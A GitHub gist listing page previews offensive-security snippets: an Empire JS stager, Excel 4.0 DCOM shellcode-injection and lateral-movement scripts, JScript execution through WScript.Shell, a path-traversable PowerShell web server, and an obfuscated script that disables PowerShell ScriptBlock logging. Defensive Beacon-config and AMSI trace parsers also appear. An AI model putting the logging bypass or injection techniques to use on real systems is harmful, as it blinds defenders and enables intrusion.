Skip to content

Instantly share code, notes, and snippets.


2XXE GeneralTesler

View GitHub Profile
infosecn1nja /
Created Jul 21, 2017
Empire stagers module to generates a .js launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]): = {
'Name': 'JS Launcher StarFighter',
'Author': ['Cn33liz'],
View jwtex_test.go
package jwtex
import (
obscuresec / dirtywebserver.ps1
Created May 18, 2014
Dirty PowerShell Webserver
View dirtywebserver.ps1
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
$HRes.ContentLength64 = $Buf.Length
jcpowermac /
Last active Jun 4, 2020
windows kubevirt

Windows Image Template

yum install /usr/bin/virt-install virtio-win
virt-install \
  --name 2016 \
 --memory 8192 \
View Invoke-Excel4DCOM64.ps1
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
function Invoke-Excel4DCOM
View Invoke-ExShellcode.ps1
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank -
function Invoke-ExShellcode
gabemarshall / jscript.ps1
Created Jan 3, 2018
Executing JScript from Powershell via .NET reflection
View jscript.ps1
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'
cobbr / ScriptBlockLogBypass.ps1
Last active Sep 19, 2021
ScriptBlock Logging Bypass
View ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
View beacon.ksy
id: beaconconfig
title: Cobalt Strike Beacon Config
endian: be
doc: |
Cobalt Strike Beacon is a popular offensive security tool. Beacon itself
is a DLL that gets injected into memory and can be staged from C2 servers.
The Beacon DLL (in unencoded form) contains a configuration section that gets
patched by the C2 server. This section is a fixed predictable structure
mgraeber-rc / GetAMSIEvent.ps1
Created Oct 8, 2021
A simple AMSI event trace parser
View GetAMSIEvent.ps1
# Author: Matt Graeber
# Company: Red Canary
# To start a trace, run the following from an elevated command prompt: logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# To stop the trace, run the following: logman stop AMSITrace -ets
# Example usage: Get-AMSIEvent -Path .\AMSITrace.etl
function Get-AMSIEvent {
param (